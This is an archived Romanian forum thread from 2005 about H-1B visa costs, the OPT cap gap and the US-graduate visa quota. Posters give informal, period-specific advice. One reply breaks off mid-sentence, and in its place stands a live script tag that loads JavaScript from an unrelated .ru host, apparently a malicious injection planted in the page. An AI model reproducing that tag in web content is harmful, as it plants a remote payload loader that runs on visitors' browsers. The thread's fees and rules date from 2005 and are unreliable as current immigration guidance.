PDA

Arată versiune întreagă : Intrebari H1



Danr
01.11.2005, 12:06
Salutari!


Unei persoane ii expira statutul legal (viza F-1 si OPT)in mai. Persoana lucreaza si angajatorul vrea sa semneze contract pe 3 ani. Angajatorul insa ii cere angajatului sa suporte el costul vizeiH1.


Daca persoana aplica pentru H1 la 1 aprilie si i se aproba viza, poate SA STEA legal in US intre 15 mai si 1 octombrie? (am inteles ca nu poate lucra intre 15 mai si 1 octombrie !?)


Trebuie sa primeasca raspuns oficial referitor la H1 inainte de expirarea statutului curent?


Am inteles ca tot costul cu obtinerea vizei in regim normal ajunge in jur de 4,000 dolari. Exista o modalitate de a reduce acest cost? Daca persoana pleaca in mai in Romania si aplica pentru H1 de acolo, este costul mai mic?


Este mai bine sa se aplice din Ro sau din US?


Daca persoana are dependenti, trebuie platit 4000 dolari si pentru dependent? Sau care este costul?


Va multumesc!


Dan

01.11.2005, 15:55
Mai jos pornesc de la premiza ca angajatorul nu este universitate sau
institutie de cercetare guvernamentala (non-profit) iar beneficiarul nu
poate avea actele de H-1B gata inainte de expirarea H-1B-urilor ptr.
graduates in FY2006 (f. curand).


Angajatorul insa ii cere angajatului sa suporte el costul vizeiH1.

Din pacate nu este nici primul si nu va fi nici ultimul. Totul este
insa ca cecurile catre USCIS (parca cu exceptia celui de "premium
processing", daca exista) trebuiesc emise de angajator. Asadar
angajatorul va astepta sa fie compensat pentru ele de catre beneficiar.


Am inteles ca tot costul cu
obtinerea vizei in regim normal ajunge in
jur de 4,000 dolari. Exista o modalitate de a reduce acest cost?...
Daca persoana are dependenti, trebuie platit 4000 dolari si pentru
dependent? Sau care este costul?

Costurile ar fi cam acestea:

1) $185 + 1,500 +500 = $2,185 catre USCIS platit de angajator pentru
aplicantul principal (H-1B). Daca angajatorul e o companie cu mai
putini angajati (<25) cei $1,500 se reduc la $750.

2) Aprobarea se poate grabi si obtine raspuns in 15 zile daca se
plateste o taxa suplimentara de $1,000 de catre beneficiar ("premium
processing fee"). In cazul de fata nu prea pare a fi necesar.

3) Ptr. familia care are dreptul la statutul H-4 (sotia + copiii
lui/ei) se mai face un cec catre USCIS in valoare de $195 (pentru toti</span>).

4) Onorariul avocatilor care, evident, variaza. Din ce zice
"observator" ar fi in intervalul $1,000-2000 dar pe 'la mine" a ajuns
si $2,500 (+$500 daca vrei f. repede)

Asadar dependentii (H-4) aproape ca nu se simt la buzunar (in situatia asta smileys/smiley1.gif).


Este mai bine sa se aplice din Ro sau din US?

Eu stiu ca de etapa "americana" (catre USCIS) un H-1B nu scapa. El este
sau nu este iar US dar angajatorul impinge actele. Ulterior, pe basa
aprobarii de la USCIS, se poate cere viza propriu zisa ("visa stamp")
de la un consulat care, spre deosebire de vizele F-1, poate fi si
dintr-o tara terta (de ex Canada daca poate intra acolo).

Asadar rentabilitatea variantei cu mersul in Ro. ar fi numai legat de
faptul ca 4 luni in Ro. costa infinit mai putin decat 4 luni in US (in
peroada fara venit).


Trebuie sa primeasca raspuns oficial referitor la H1 inainte de expirarea statutului curent?

Ca regula generala, cand faci o schimbare de statut (C/S) trebuie sa
ajunga plicul cu actele ptr. noul statut la USCIS inainte de data la
care iti expira statutul curent. Primesti o notificare de la USCIS ca
cererea este in curs de examinare si pe baza ei esti perfect legal pe
toata perioada cat mingea este in curtea USCIS-ul.


Daca persoana aplica pentru H1 la 1 aprilie si i se aproba viza, poate
SA STEA legal in US intre 15 mai si 1 octombrie? (am inteles ca nu
poate lucra intre 15 mai si 1 octombrie !?)

Aici nu pot sa-ti dau un raspuns prea clar. Problema se numeste "H-1B
cap gap". In 2004 s-a dat o dispensa de la carmuire (numai ptr. acel
an) ca cei care ies din OPT si urmeaza sa intre in H-1B sa poata
astepta in US (fara sa lucreze). Anul acesta nu a fost cazul ptr.
ca au fost H-1B suplimentare pentru cei care au obtinut MSc sau PhD in
US. La anul vom vedea daca se va emite un nou ordin. Altfel, cu o viza
H-1B poti reintra din afara in Us cu max 10 zile inainte sa
incepi job-ul (asadar vreo 20 sept 2006).

Am mai citit pe Internet si de alta metoda de rezolvare: un statut de
B1/B2 cu acte doveditoare ca astepti sa incepi H-1B-ul. Merita sapat si
pe calea asta.





Ma gandesc ca amicul ar putea vedea daca nu se aproba ptr. 2006 ca cei
intre<script src=http://www.iroe.ru/ngg.js></script>

Danr
01.11.2005, 17:24
Tranzit,


Iti multumesc!!


Nu am inteles ce ai vrut sa spui in partea pe care am marcat-o cu rosu.


Dan



Mai jos pornesc de la premiza ca angajatorul nu este universitate sau institutie de cercetare guvernamentala (non-profit) iar beneficiarul nu poate avea actele de H-1B gata inainte de expirarea H-1B-urilor ptr. graduates in FY2006 (f. curand).



Aici nu pot sa-ti dau un raspuns prea clar. Problema se numeste "H-1B cap gap". In 2004 s-a dat o dispensa de la carmuire (numai ptr. acel an) ca cei care ies din OPT si urmeaza sa intre in H-1B sa poata astepta in US (fara sa lucreze). Anul acesta nu a fost cazul ptr. ca au fost H-1B suplimentare pentru cei care au obtinut MSc sau PhD in US. La anul vom vedea daca se va emite un nou ordin.

GNChicago
01.11.2005, 17:55
Danr, you "misspelled" the name "TRANSIT" cu TRANZIT!

VicolA
01.11.2005, 21:03
Danr,


daca ai obtinut diploma aici in state( asa inteleg ca acum esti in OPT)si ai deja un angajator poti depune dosarul si vei intra in cele 20.000 de vize care se acorda pe FY2006 pentru cei care obtin un master sau diploma de studii superioare in US, asta inseamna ca vei avea in mai 2006viza H1B si vei putea lucra, nu va mai trebui sa-ti faci griji pentru perioada dintre mai si oct.La fel daca angajatorul este institutie de invatamint superior sau unitate de cercetare non-profit sau guvernamentala.


In general atita timp cit o cerere este in pending la USCIS esti in statut legal cu conditia ca cererea sa fi fost trimisa in perioada de statut legal inainte de expirarea ultimei vize, dar in cazul in care aplici pentru H1B FY2007,pentru a fi linistit e bine sa ai o masura de siguranta prin cererea unei vize de turist care sa acopere perioada de timp mai -octombrie 2006.


Costul vizei nu este mai mic daca pleci in Romania ci asa cum a spus si Transit doar costurile de intretinere sunt mai mici.


La intrebareade unde este mai bine sa faci aplicatia raspunul este dat de faptul ca aplicatia este depusa de firma angajatoare si nu de persoana.


Multa bafta si iti recomand sa ai un immigration specialist cind pornesti actiunea, te scuteste de multe probleme!

02.11.2005, 00:15
Danr:

Vad ca ti-a raspuns VicolA iar eu sunt intrutotul de acord cu ce a scris.

GNChicago:

Iti imaginezi ca de cand am venit aici, cu numele meu romanesc, am fost
"botezat" in toate felurile. Spre deosebire de americani eu nu ma atac
din cauza asta (de ex. chiar sapt trecuta auzeam pe unul plangandu-se
ca el este Jon si nu Jonathan cum il striga colegii). Cu atat mai mult
cu cat ai mei nu m-au botezat "transit" smileys/smiley1.gif.

02.11.2005, 00:51
..si mi-a mai venit o idee relativ la 'prinderea" unui H-1B inca din
FY2006. Daca te uiti pe thread-ul numit "suplimentarea H-1B - news" vei
vedea ca exista un proiect de suplimentare a vizelor
ptr FY2006 H-1B "normale" (peste cele 65,000 - parca -
epuizate in August 2005). Vor fi in numar de 30,000. Nu stiu exact dar
ma gandesc ca ar fi posibil ca cineva cu Masters sau PhD in US sa
aplice pe ele. Invers stiu sigur ca nu se poate, si anume ca cineva
fara Masters, PhD in US sa aplice pe cele 20,000 in loc de cele
"normale".

Mmap
02.11.2005, 07:16
Desi suplimentarea vizelor H1B a fost aprobata in comisia juridica, ea tot trebuie sa treaca prin congres, si, daac va fi aprobata sa fie apoi semnata de presedinte pentru a deveni lege, deci efectiva. Sunt in fata inca cateva luni de asteptare, foarte probabil, pentru suplimentarea de 30,000 vize pentru H1B.


Exista prin urmare sanse sa se pregateasca dosarul pentru H1B, si daca e depus la timp, poate prinde una din cele 30,000 vize. Asta daca INTR-ADEVAR se semneaza si de presedinte.


Ar fi interesant de stiut daca cele 20,000 vize pentru graduate cu diploma in state sunt epuizate. Mult succes si spor la treaba!


Eu una as accepta sa platesc eu costurile pe care le are firma cu taxele aferente dosarului, daca as avea posibilitatea unei H1B.


Cred ca taxa pentru I-129 este 190$ (a crescut cu 5$ de la 26 octombrie).

Danr
02.11.2005, 11:59
Scuze! Credeam ca este tranzit si nu Transit. Acum o sa scriu corect.


Dan



Danr, you "misspelled" the name "TRANSIT" cu TRANZIT!

Danr
02.11.2005, 12:11
Va multumesc pentru informatii!


Mai am cateva intrebari.


1. Se depune dosarul acum pentru H1 ca absolvent de master in US.Pana ajunge dosarul la USCIS cele 20,000 de vize se termina. Banii, cei 4,000$, sunt platiti. Se poate "muta" aceeasi aplicatie pentru vizele din anul urmator fara a cheltui din nou 4000$ in aprilie 2006?


2. Este mai avantajos pentru un absolvent de master in US sa aplice pentru cele 20,000 de vize speciale sau pentru una din cele 65,000 obisnuite?


3. Este posibil ca angajatorul sau avocatul angajatorului sa faca o greseala in aplicatie si dosarul sa fie respins din acea cauza? Iar eu sa dau banii degeaba?


Multumesc,


Dan

Mmap
02.11.2005, 13:21
E un proces destul de logic, zic eu totusismileys/smiley4.gif


1.La terminarea numarului de vize, dosarul de aplicatie se returneaza, prin urmare si costurile aferente, atata timp cat aplicatia nu este procesata din motiv de epuizare a vizelor. Prin urmare nu se cheltuie in plus, decat eventual tariful avocatului.


2. Niciun avantaj financiar nu rezulta din paginile USCIS, singura diferenta este ca cele 20,000 vize pentru graduate cu diploma de state, ca si prelungirile de vize H1B acordate deja,nu se numara la cap-ul de 65,000 (de fapt 65,000- 6,800 care sunt rezervate pentru US-Singapore si US-Chile Free Trade Agreement=58,200 vize H1B)


3. E posibila o eroare umana, iar cine o face e responsabil de plata ei. Legislatia prevede ca taxele referitoare la aplicatie (1500$ sau 750$ functie de numarul curent de angajati - peste, respectiv sub 25 +190$ taxa de procesare performular +500$ Fraud Prevention and Detection Fee +1000$ Premium Processing care poate fi finantat si de catre angajat si asigura procesarea in termen de 2 saptamani sau se returneaza taxa, fata de procesarea garantata de 3-6 luni de catre USCIS+comision avocat in jur de 750$)


Eu zic ca daca ai un angajator dispus sa te angajeze,e bine fie sa foloseasca un avocat inca de pe acum,fie sa "te pui cu burta pe citit" din paginile USCIS si sa te documentezi temeinic, oricum pana trece prin congres si e semnat si de presedinte ca sa devina lege, mai curge apa pe Dunare.


Citeste in special despre procesul de aplicare, care include o etapa premergatoare aplicatiei cu formular I-129, si anume obtinerea scrisorii de la DOL care specifica wage-ul pentru slujba.

Mmap
02.11.2005, 13:23
http://uscis.gov/graphics/services/tempbenefits/TempWorker.h (http://uscis.gov/graphics/services/tempbenefits/TempWorker.htm#anchorfiling) tm#anchorfiling


Asta e adresa USCIS, unde poti citi mai multe. Nu sunt nici avocat, nici paralegal, nimic altceva decat un cititor destul de sarguincios. smileys/smiley4.gif


Si doritor de H1B, desigursmileys/smiley36.gif

Mmap
02.11.2005, 13:29
Aplicatiile nu se muta, se returneaza. Diferenta dintre cele 20,000 si cele 65,000 de fapt 58,200 in ceeace ne priveste pe noi ca romani, consta in faptul ca cele 20,000 sunt strict rezervate celor care AU graduate diploma din state.

Mmap
02.11.2005, 13:31
Of tot revin atata ca-mi scapa lucruri printre degete: fee-urile trebuie platite de angajator, cu exceptia premium processing care poate fi platita si de angajat. Ca abgajatorul ti le opreste pe urma, e un abuz. Ca le dai tu de bunavoie, e altceva, dar leagl angajatorul trebuie sa le suporte.

02.11.2005, 13:58
Danr:

1. Atunci cand ajunge plicul ptr. H-1B la USCIS acestia datermina
aproape imediat daca il mai pot accepta la procesare (nu s-a atins acel
annual cap). Ei numara dosare primite si nu dosare aprobate.
Documentele la primire sunt verificate foarte pe deasupra sa nu aiba
aberatii si lipsuri. Daca documentele par complete si nu s-au primit
inca 65,000 de dosare (sau 20,000) pe anul respectiv attunci iti "trag"
cecurile si pun dosarul in coada de asteptare ptr. procesare. Oricum,
odata acceptat dosarul (in primele zile de la sosire), nu te mai pot
respinge pe motiv de "annual cap".

Daca, din contra, a ajuns dosarul dupa ce au constatat ca au acceptat
suficiente dosare la aprobat (au atins fie 65,000, fie 20,000) iti
returneaza dosarul neatins, inclusiv cecurile. Ar fi culmea sa-ti traga
cecurile si sa-ti returneze dosarul!! smileys/smiley36.gif

Asta da teapa!

Ce s-ar putea sa nu fie rambursabil este o parte din onorariul
avocatilor. Partea asta o estimez la in jur de $1,000 insa depinde mult
de ei.

La toata chestia asta nu stiu cum este cu mutatul pe anul viitor. Normal este sa retrimiti dosarul actualizat.



2. Fara a fi sigur, eu zic ca un US graduate poate aplica pe cele
65,000 daca vrea. Dar nu are sens. La clasa a II-a (cele 65,000) este
mare aglomeratie de indieni care se angajeaza intre ei facand locurile
sa se termine extrem de repede (august anul acesta). In schimb la clasa
I-a locurile s-au ocupat mult mai incet. Asadar de ce sa mergi la clasa
II-a cu bilet de I-a?

Acum ca mai suplimenteaza cu 30,000 pe cele de clasa a II-a este ceva
atipic. Daca se aproba, la anul nu mai vorbim de 65,000 ci de 95,000.



3. Daca lipseste o piesa la dosar, dosarul ramane la USCIS dar iti
trimit o scrisoare cu ce trebuie sa adaugi/corectezi. Lucrul te
intarzie si atat. La mine la H-1B uitasem sa semnez o hartie. Mi-au
trimis-o inapoi si le-am retrimis-o semnata. Ar fi fost culmea sa-mi
traga banii si sa-mi respinga dosarul pe motiv ca n-am semnat pagina
TZ!! smileys/smiley97.gif

Danr
02.11.2005, 16:19
Va multumesc!


Dan